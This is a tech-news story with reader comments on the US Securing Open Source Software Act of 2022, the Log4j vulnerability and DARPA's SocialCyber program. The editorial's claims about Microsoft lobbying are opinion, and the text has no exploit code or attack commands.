from the homespun-security dept.
US Senators Gary Peters (D-MI) and Rob Portman (R-OH) introdced S.4913 - Securing Open Source Software Act of 2022 the other day. It has been read twice and referred to the Committee on Homeland Security and Governmental Affairs. Here is the US Senate's press release:
U.S. Senators Gary Peters (D-MI) and Rob Portman (R-OH), Chairman and Ranking Member of the Homeland Security and Governmental Affairs Committee, introduced bipartisan legislation to help protect federal and critical infrastructure systems by strengthening the security of open source software. The legislation comes after a hearing convened by Peters and Portman on the Log4j incident earlier this year, and would direct the Cybersecurity and Infrastructure Security Agency (CISA) to help ensure that open source software is used safely and securely by the federal government, critical infrastructure, and others. A vulnerability discovered in Log4j – which is widely used open source code – affected millions of computers worldwide, including critical infrastructure and federal systems. This led top cybersecurity experts to call it one of the most severe and widespread cybersecurity vulnerabilities ever seen.
[...] The overwhelming majority of computers in the world rely on open source code – freely available code that anyone can contribute to, develop, and use to create websites, applications, and more. It is maintained by a community of individuals and organizations. The federal government, one of the largest users of open source software in the world, must be able to manage its own risk and also help support the security of open source software in the private sector and the rest of the public sector.
The Securing Open Source Software Act would direct CISA to develop a risk framework to evaluate how open source code is used by the federal government. CISA would also evaluate how the same framework could be voluntarily used by critical infrastructure owners and operators. This will identify ways to mitigate risks in systems that use open source software. The legislation also requires CISA to hire professionals with experience developing open source software to ensure that government and the community work hand-in-hand and are prepared to address incidents like the Log4j vulnerability. Additionally, the legislation requires the Office of Management and Budget (OMB) to issue guidance to federal agencies on the secure usage of open source software and establishes a software security subcommittee on the CISA Cybersecurity Advisory Committee.
Software freedom is not named explicitly in their definition as far as their diff^wtext goes. Nor are the free-of-charge, royalty-free aspects mentioned. Yet the text of S.4913 nevertheless seems to be a nod in the direction of Free Software:
(5) OPEN SOURCE SOFTWARE.—The term 'open source software' means software for which the human-readable source code is made available to the public for use, study, re-use, modification, enhancement, and re-distribution.
Behind the scenes, representatives from Microsoft appear to be milking the log4j circus for gain as shown by multiple other articles, not linked to here, and their vastly increased activity and presence in DC.
Overall, the legislative process needs to find a way to use versioning software so that all the "inserting before ...", "inserting after ...", "redesignating paragraphs ...", and other modifications can be easily processed and the current draft easily visible. However, that's not as simple as opening an account on GitLab or Src.ht and letting m$ and the rest of the world hammer at it unauthenticated and uncurated.
(2022) The US Military Wants To Understand The Most Important Software On Earth
(2021) 'The Internet's on Fire': Techs Race to Fix Major Cybersecurity Software Flaw
'The Internet is on Fire'
The problem lies in Log4j, a ubiquitous, open source Apache logging framework that developers use to keep a record of activity within an application. Security responders are scrambling to patch the bug, which can be easily exploited to take control of vulnerable systems remotely. At the same time, hackers are actively scanning the internet for affected systems. Some have already developed tools that automatically attempt to exploit the bug, as well as worms that can spread independently from one vulnerable system to another under the right conditions.
Log4j is a Java library, and while the programming language is less popular with consumers these days, it's still in very broad use in enterprise systems and web apps. Researchers told WIRED on Friday that they expect many mainstream services will be affected.
For example, Microsoft-owned Minecraft on Friday posted detailed instructions for how players of the game's Java version should patch their systems. "This exploit affects many services—including Minecraft Java Edition," the post reads. "This vulnerability poses a potential risk of your computer being compromised." Cloudflare CEO Matthew Prince tweeted Friday that the issue was "so bad" that the internet infrastructure company would try to roll out a least some protection even for customers on its free tier of service.
All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j version 2.0 or higher. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.
"It's a design failure of catastrophic proportions," says Free Wortley, CEO of the open source data security platform LunaSec. Researchers at the company published a warning and initial assessment of the Log4j vulnerability on Thursday.
The MIT Technology Review writes in a long form article about how DARPA has rediscovered Free and Open Source Software, or at least the latter, and how it is now found everywhere across the board. As far as the Internet and the World Wide Web goes, its ubiquity has been a given since they were founded on it, but nowadays even at least 70% of closed source, proprietary products also contain lots of it. DARPA is worried about the kernel Linux in particular and the vetting process for adding code to the project specifically.
Now DARPA, the US military's research arm, wants to understand the collision of code and community that makes these open-source projects work, in order to better understand the risks they face. The goal is to be able to effectively recognize malicious actors and prevent them from disrupting or corrupting crucially important open-source code before it's too late.
DARPA's "SocialCyber" program is an 18-month-long, multimillion-dollar project that will combine sociology with recent technological advances in artificial intelligence to map, understand, and protect these massive open-source communities and the code they create. It's different from most previous research because it combines automated analysis of both the code and the social dimensions of open-source software.
"The open-source ecosystem is one of the grandest enterprises in human history," says Sergey Bratus, the DARPA program manager behind the project.
"It's now grown from enthusiasts to a global endeavor forming the basis of global infrastructure, of the internet itself, of critical industries and mission-critical systems pretty much everywhere," he says. "The systems that run our industry, power grids, shipping, transportation."
Recently, software appears to have been occupying a lot of attention over in Washington, DC. Unfortunately occasional lines in mainstream articles indicate that it is M$ and M$ lobbyists are steering the policy discussion there. It appears that they are spending an enormous amount of time in direct contact with politicians and policy makers, all the while log4j is still getting milked by them as a distraction from all the actively exploited vulnerabilities in their own products.
(Score: 3, Interesting) by ElizabethGreene on Wednesday September 28 2022, @05:29PM (5 children)
Bias disclosure: I work for Microsoft, therefore my opinion is invalid.
I'd like to see the framework requirements in Sec 2220E.c.2.A (https://www.congress.gov/bill/117th-congress/senate-bill/4913/text#id2E6B3340D2094A61B77A7380FFAB5D39) expanded to include both Open and Closed Source software. It's not unreasonable to ask all federal software vendors to include an OSS BOM and simultaneously answer those questions vis-a-vis their software.
The requirements from that section are...
Realistically though, knowing what a clown-show the federal procurement process is, $Vendors are unlikely to let that happen.
(Score: 2) by Thexalon on Wednesday September 28 2022, @07:37PM (1 child)
So the thing about that is that doing that with closed-source software is basically impossible:
1. You can't simply rely on what the vendor tells you, because all vendors regardless of their condition will swear on their mother's grave that their software is perfectly secure, extremely popular, with minimal risk, and has a healthy community of support staff and users. That largely renders points (i), (ii), (iv), (v), and (vi) in your list moot.
2. You can't really rely on the vendor sharing source code with the government to verify point (i), because the code that gets compiled / interpreted and released might not match the code shared with the government.
3. Even if you have a scrupulously honest vendor, the often-closed-source compiler / interpreter might be intentionally introducing vulnerabilities.
4. The number and severity of publicly-known, unpatched vulnerabilities, point (iii), really isn't a great metric when comparing open-source and closed-source software, because closed-source software is more likely to have not-publicly-known but unpatched vulnerabilities, simply because there are fewer good-guy eyes looking at the code for problems.
Doing this really right would involve having the government, probably under the NSA or somebody like that, with a team of programmers going through any open-source package used by the US government and contributing security fixes, which would also help all the private users of that package. So far, they've been reluctant to do that, largely because while they want the US government secure they also want foreign governments insecure so they can get a signal-intelligence advantage. So what we're probably going to see come out of this is a US-government version of the less secure software that gets deployed onto their machines but is not distributed.
The only thing that stops a bad guy with a compiler is a good guy with a compiler.
(Score: 2, Interesting) by Sjolfr on Wednesday September 28 2022, @09:48PM
3.5 - there is no way to see the competency of closed source developers so any guidelines become useless pretty quick.
Most opensource projects would eventually reject government packages because they would be introducing specific things that may break the vision of the developers anyway. That's the beauty of opensource ... government can hire vetted developers and make changes to the code and produce government only packages.
And, much like the UofMN failed attempts that got them banned from linux kernel contributions, they (gov or individuals) can easily see and track all the code and remove the crap some idiot/terrorist tries to add.
Opensource is a government dream as long as they can keep competent developers on staff.
(Score: 2) by legont on Thursday September 29 2022, @11:51PM (2 children)
C, C++ and Assembly do not qualify.
"Wealth is the relentless enemy of understanding" - John Kenneth Galbraith.
(Score: 2) by ElizabethGreene on Friday September 30 2022, @02:56AM (1 child)
No language is memory safe if you use it wrong enough. :)
(Score: 2) by legont on Friday September 30 2022, @08:48PM
You are probably right, but my point was the legal angle. Are we about to outlaw C? It is a very serious question.
"Wealth is the relentless enemy of understanding" - John Kenneth Galbraith.
(Score: 0) by Anonymous Coward on Wednesday September 28 2022, @07:48PM
Our friends, The Corporations have told us
RMS and his spawn are evil, so we will nibble them to death with ducks.
(Score: 1, Insightful) by Anonymous Coward on Wednesday September 28 2022, @07:59PM
Coincidence, or conspiracy?
(Score: 2) by HammeredGlass on Wednesday September 28 2022, @09:18PM
Anything he's slapping his name is guaranteed garbage from the start. Reading through this bill will most likely prove me out.
(Score: 3, Informative) by SomeRandomGeek on Wednesday September 28 2022, @10:46PM
To be used by the (US Federal) government, software must comply with certain rules, many of which relate to security. I have been through the process to make closed source software comply with the rules. I can say from experience that the compliance process tends to improve improve security significantly (for a commercial product where security was an afterthought at best.) But it does not produce the same level of security as a "security first" mentality. And it's a huge pain in the ass. Because of this, I think it is in the interest of the government to pay to make compliant forks of open source projects that they are interested in. But I don't think it is really in the interest of the maintainers of those projects to make the trunk compliant. It's too expensive (in terms of slowing down their development) for the security benefits it brings in. It is probably in everyone's best interest for the government to pay the maintainers to fix security bugs upstream rather than to try to fix them themselves in their fork.
(Score: 0, Offtopic) by Tokolosh on Thursday September 29 2022, @12:47AM
The most terrifying words in the English language are: "I'm from the government and I'm here to help."